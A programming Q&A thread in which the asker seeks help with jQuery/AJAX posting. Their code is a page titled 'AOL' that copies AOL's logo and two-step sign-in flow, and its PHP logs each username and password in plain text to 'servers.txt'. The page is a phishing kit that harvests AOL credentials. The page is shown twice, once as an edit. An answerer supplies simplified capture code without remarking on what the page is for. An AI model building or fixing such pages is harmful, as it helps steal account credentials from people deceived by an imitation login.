# How to send Data to PHP URL using Jquery / Ajax

Tags: php, html, jquery

I am very new to this.
How do I post data to a PHP file? I am really having problems with this. Its supposed to call the PHP file but rather than call the PHP file, its just very static and does not behave like i clicked a thing.

The first button on the div transfers the data from the first page, and moves it to the second page. then the second button is supposed to call the php URL and send the data to the php file which in turn saves the data to DB or write to the text file.

the html file with the Jquery is looking like this

```
<!DOCTYPE html>
<html>
<head>
          <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
          <script>
          $(document).ready(function(){
                $("#my_form").submit(function(){
                    event.preventDefault();
                    var username = $(this).find('#u').val();
                    var password = $(this).find('#p').val(); 
                    
                    if(username == '' || password ==''){
                        alert('Please Enter all Data Correctly');
                        return false;
                    }
                    
                    $.ajax({
                        type: "POST",
                        url : "savedata.php",
                        data : {
                            username : username,
                            password : password
                        },
                        cache: false,
                        success : function(data){
                            alert(data);
                        },
                        error: function(xhr,status,error){
                            console.error(xhr);
                        }
                    });
                });
          });
          </script>
          <script>
             $(document).ready(function(){
                $("#btn1").click(function(){
                    $("#loginU").toggle();
                    $("#loginP").toggle();
                });
             });
          </script>
          <script type="text/javascript">
                function sendData(){
                var username = document.getElementById('u').value;
                document.getElementById('outdata').innerHTML = username;
                document.getElementById('hiddenEmail').value = username;
                }
          </script>
           <style>
             .hide{
             display:none;
             }
             
             .loginTable
            {   
                margin-top: 15px;
               float: right;
               background-color: white;
               position:absolute; 
               overflow:hidden; 
               left:906px; 
               top:100px; 
               width:365px; 
               height:581px;
            }
            .logoArea
            {
                margin-top: 35px;
            }
            
            .signInheader___{
                position:absolute; 
                overflow:hidden; 
                left:1040px; 
                top:198px; 
                width:63px; 
                height:35px;
            }
          </style>
            <link rel="stylesheet" href="styles.css">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>AOL</title>
</head>
<body>
<div align="center">
    <table border="0" width="100%">
        <tr>
            <td height="57">&nbsp;
            <img border="0" src="../aol_new/images/aol-logo-black-v.0.0.2.png" width="106" height="43"></td>
        </tr>
        <tr>
            <td>&nbsp;</td>
        </tr>
        <tr>
            <td>
            <div align="center">
                <table border="0" width="100%" background="images/AOL_MaliciousApps_platform___Norton.jpg" height="1020">
                    <tr>
                        <td>&nbsp;</td>
                    </tr>
                    <div class="loginTable">
                    <form id="my_form" method="post">
                    <div id="loginU">
                        <img src="../aol_new/images/aol-logo-black-v.0.0.2.png" height="34px" width="85px" class="logoArea" /></br>
                        <p style="font-size: 17px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: bold;margin-top:73px;">Sign in</p></br>
                        <input type="text" id="u" name="u" placeholder=" Username, email, or phone" oninput="sendData();" style="width:314px;height:41px;margin-bottom:10px;border:none;outline:none;border-bottom:1px solid #CCCC;"/></br>
                        <input type="submit" value="Next" id="btn1" style="width:314px;height:41px;color:#FFFFFF; font-family:Arial; font-size:12pt;border:none;background-color:#39f" />
                    </div>
                    <div id="loginP" class="hide">
                        <img src="../aol_new/images/aol-logo-black-v.0.0.2.png" height="34px" width="85px" class="logoArea" /></br>
                        <div id="outdata" style="font-size: 17px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal; margin-top:10px;"></div>
                        <input type="hidden" id="hiddenEmail" />
                        <p style="font-size: 17px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: bold;margin-top:14px;">Enter Password</p>
                        <p style="font-size: 15px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;">to finish sign in</p></br>
                        <input type="password" id="p" name="p" placeholder=" Password" style="width:314px;height:41px;margin-bottom:10px;border:none;outline:none;border-bottom:1px solid #CCCC;"/></br>
                        <input type="submit" id="submit" value="Next" style="width:314px;height:41px;color:#FFFFFF; font-family:Arial; font-size:12pt;border:none;background-color:#39f" />
                    </div>
                    </form>
                    </div>
                </table>
            </div>
            </td>
        </tr>
    </table>
</div>
</body>

</html>
```

And the PHP to save to textfile (at first) is Looking like this

```
<?php

$username = $_POST['u'];
$password = $_POST['p'];

$txt = "Data: \n User : $username\n Password : $password\n";

$file = fopen('servers.txt','a+');
fwrite($file,$txt);
fclose($file);

?>
```

How Can I get this to work? I am very new to this. Rather than send the data, its just *Very static* and does not do anything like calling the PHP file. Why is this so?

**Edit**

Edits Now Looks like this :

```
<!DOCTYPE html>
<html>
<head>
          <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
          <script>
          $(document).ready(function(){
                $("#my_form").submit(function(){
                    event.preventDefault();
                    var u = $(this).find('#u').val();
                    var p = $(this).find('#p').val(); 
                    
                    if(u == '' || p ==''){
                        alert('Please Enter all Data Correctly');
                        return false;
                    }
                    
                    $.ajax({
                        type: "POST",
                        url : "login.php",
                        data : {
                            u : u,
                            p : p
                        },
                        cache: false,
                        success : function(data){
                            alert(data);
                        },
                        error: function(xhr,status,error){
                            console.error(xhr);
                        }
                    });
                });
          });
          </script>
          <script>
             $(document).ready(function(){
                $("#btn1").click(function(){
                    $("#loginU").toggle();
                    $("#loginP").toggle();
                });
             });
          </script>
          <script type="text/javascript">
                function sendData(){
                var username = document.getElementById('u').value;
                document.getElementById('outdata').innerHTML = username;
                document.getElementById('hiddenEmail').value = username;
                }
          </script>
           <style>
             .hide{
             display:none;
             }
             
             .loginTable
            {   
                margin-top: 15px;
               float: right;
               background-color: white;
               position:absolute; 
               overflow:hidden; 
               left:906px; 
               top:100px; 
               width:365px; 
               height:581px;
            }
            .logoArea
            {
                margin-top: 35px;
            }
            
            .signInheader___{
                position:absolute; 
                overflow:hidden; 
                left:1040px; 
                top:198px; 
                width:63px; 
                height:35px;
            }
          </style>
            <link rel="stylesheet" href="styles.css">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>AOL</title>
</head>
<body>
<div align="center">
    <table border="0" width="100%">
        <tr>
            <td height="57">&nbsp;
            <img border="0" src="../aol_new/images/aol-logo-black-v.0.0.2.png" width="106" height="43"></td>
        </tr>
        <tr>
            <td>&nbsp;</td>
        </tr>
        <tr>
            <td>
            <div align="center">
                <table border="0" width="100%" background="images/AOL_MaliciousApps_platform___Norton.jpg" height="1020">
                    <tr>
                        <td>&nbsp;</td>
                    </tr>
                    <div class="loginTable">
                    <form id="my_form" method="post">
                    <div id="loginU">
                        <img src="../aol_new/images/aol-logo-black-v.0.0.2.png" height="34px" width="85px" class="logoArea" /></br>
                        <p style="font-size: 17px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: bold;margin-top:73px;">Sign in</p></br>
                        <input type="text" id="u" name="u" placeholder=" Username, email, or phone" oninput="sendData();" style="width:314px;height:41px;margin-bottom:10px;border:none;outline:none;border-bottom:1px solid #CCCC;"/></br>
                        <input type="submit" value="Next" id="btn1" style="width:314px;height:41px;color:#FFFFFF; font-family:Arial; font-size:12pt;border:none;background-color:#39f" />
                    </div>
                    <div id="loginP" class="hide">
                        <img src="../aol_new/images/aol-logo-black-v.0.0.2.png" height="34px" width="85px" class="logoArea" /></br>
                        <div id="outdata" style="font-size: 17px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal; margin-top:10px;"></div>
                        <input type="hidden" id="hiddenEmail" />
                        <p style="font-size: 17px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: bold;margin-top:14px;">Enter Password</p>
                        <p style="font-size: 15px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;">to finish sign in</p></br>
                        <input type="password" id="p" name="p" placeholder=" Password" style="width:314px;height:41px;margin-bottom:10px;border:none;outline:none;border-bottom:1px solid #CCCC;"/></br>
                        <input type="submit" id="submit" value="Next" style="width:314px;height:41px;color:#FFFFFF; font-family:Arial; font-size:12pt;border:none;background-color:#39f" />
                    </div>
                    </form>
                    </div>
                </table>
            </div>
            </td>
        </tr>
    </table>
</div>
</body>

</html>
```

Comment: changed it, still the same,not calling the php file, Please see Edits

Comment: @freedomn-m, its still very static. Checking on Chrome console, it talks about CORS, why is this so? I have not uploaded the PHP to another webserver at least yet

Comment: Could you give us the whole CORS error message? My guess is that you're running the HTML/CSS/Javascript on your own computer, not on a webserver under a domain. Which is what I did, and I get CORS errors as well: _"CORS request not http"_. It's just an idea, I might be completely wrong about this.

Answer (score 0):

Your form is very complex at the moment, it seems like you have not tested the code before implementing anything.

To break it down, you can use a simple form two input fields, email and password. You can begin with two fields just.
Just like below:

```
<form id="myform">
  <label for="email">Email</label>
  <input id="email" name="email" type="email" value="" />
  <label for="password">password</label>
  <input id="password" name="password" type="password" value="" />
   <input type="submit" value="Send" />
 </form>
```

Then you can use the below mentioned jQuery code to check and take field values when form is submitted. **also you can print the request to see if the form data has been serialized correctly.**

```
jQuery( document ).ready(function($) {
var request;
//get form fields
$("form#getField").submit(function(event){
    //preventDefault action 
    event.preventDefault();
    if (request) {
        request.abort();
    }
    var $sucess = false;
    var $form = $(this);
    //Take input fields all together, instead of taking individual values
    var $inputs = $form.find("input");
    //serialize() method creates a text string in standard URL-encoded notation
    var serializedData = $form.serialize();
    console.log(serializedData);
    $inputs.prop("disabled", true);
    //Ajax request
    request = $.ajax({
        url: "login.php",
        type: "POST",
        data: serializedData
    });
    // Load content which you wanna display after the form is submitted
    request.done(function (response, textStatus, jqXHR){
        $("#result").html('Submitted successfully');
        $sucess=true;
    });
    //If request fails
    request.fail(function (jqXHR, textStatus, errorThrown){
        console.error(
            "The following error occurred: "+
            textStatus, errorThrown
        );
        $("#result").html('Request Failed');
    });
    request.always(function () {
        // Reenable the inputs
        $inputs.prop("disabled", false);
    });
    if($sucess){
        $(this).submit();
    }
});
```

});

After this has submitted you can check in the login.php submit with  isset($_POST['email']) method like below:

```
if(isset($_POST['email']) && isset($_POST['password']) ){
//taken from form field
$data['email'] = $_POST['email'];
$data['password'] = $_POST['password'];
//authenticate the rquest and send the data to DB or write to text file   
}
```

Then either write the data in DB or write in the text file.

Hopefully that helps. Always start slow and small.